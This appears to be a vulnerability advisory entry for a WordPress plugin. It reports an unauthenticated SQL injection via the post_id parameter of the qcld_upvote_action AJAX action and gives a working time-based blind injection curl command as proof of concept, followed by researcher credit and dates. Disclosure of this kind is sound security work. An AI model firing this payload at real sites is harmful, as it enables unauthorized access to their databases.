The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcld_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection
curl https://example.com/wp-admin/admin-ajax.php --data 'action=qcld_upvote_action&post_id=(CASE WHEN (78=78) THEN SLEEP(5) ELSE 6639 END)'
cydave
cydave
Yes
2022-02-28 (about 1 years ago)
2022-02-28 (about 1 years ago)
2022-04-17 (about 1 years ago)